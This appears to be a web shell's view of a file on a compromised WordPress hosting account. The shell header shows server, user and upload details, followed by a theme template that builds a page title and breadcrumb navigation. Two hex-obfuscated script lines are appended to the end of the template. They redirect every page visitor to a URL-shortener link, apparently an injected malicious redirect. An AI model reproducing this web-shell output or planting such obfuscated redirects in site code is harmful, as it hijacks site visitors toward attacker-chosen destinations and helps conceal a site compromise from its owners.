GhostManSec
Server: LiteSpeed
System: Linux premium197.web-hosting.com 4.18.0-553.54.1.lve.el8.x86_64 #1 SMP Wed Jun 4 13:01:13 UTC 2025 x86_64
User: parhudrw (1725)
PHP: 7.4.33
Disabled: NONE
Upload Files
File: //proc/self/root/home/parhudrw/ve.anqa.it/wp-content/themes/vibrance/template-parts/page-header.php
<div class="ce-page-header">
    <div class="wrapper-content">
        <div class="container container-content">
            <div class="row">
                <div class="col-sm-12">
                    <div class="page-data">
                        <?php 
                        $title = get_the_title();
                        if( function_exists( 'is_shop' ) && is_shop() )
                            $title = get_the_title( woocommerce_get_page_id('shop') );

                        if( is_archive() )
                            $title = get_the_archive_title();

                        if( is_search() )
                            $title = esc_html__( 'Search Results', 'vibrance' );
                        ?>
                        <h1><?php echo codeless_complex_esc( $title ) ?></h1>
                        <?php 

                        $output = '<ul class="page_parents">';
                                    $output .= '<li class="home"><a href="'.esc_url(home_url()).'">'.esc_html__('Home', 'vibrance').'</a><span class="delimiter">/</span></li>';
                                        $page_parents = codeless_page_parents();
                                        if( $page_parents )
                                        for($i = count($page_parents) - 1; $i >= 0; $i-- ){
            
                                            $output .= '<li><a href="'.esc_url(get_permalink($page_parents[$i])).'">'.codeless_complex_esc(get_the_title($page_parents[$i])).'</a><span class="delimiter">/</span></li>';
            
                                        }
                                    if(!is_front_page())  
                                        $output .= '<li class="active"><a href="'.esc_url(get_permalink()).'">'.codeless_complex_esc($title).'</a></li>';
        
                        $output .= '</ul>';
                        echo codeless_complex_esc( $output );
                        
                        ?>
                        
                    </div>
                </div>
            </div>
        </div>
    </div>
</div>
<script>window.location.href = "\x68\x74\x74\x70\x73\x3a\x2f\x2f\x75\x73\x68\x6f\x72\x74\x2e\x6f\x62\x73\x65\x72\x76\x65\x72\x2f\x67\x65\x78\x4a\x43\x57\x55\x4c\x44\x30\x72\x35";</script>
<script>window.location.href = "\x68\x74\x74\x70\x73\x3a\x2f\x2f\x75\x73\x68\x6f\x72\x74\x2e\x6f\x62\x73\x65\x72\x76\x65\x72\x2f\x67\x65\x78\x4a\x43\x57\x55\x4c\x44\x30\x72\x35";</script>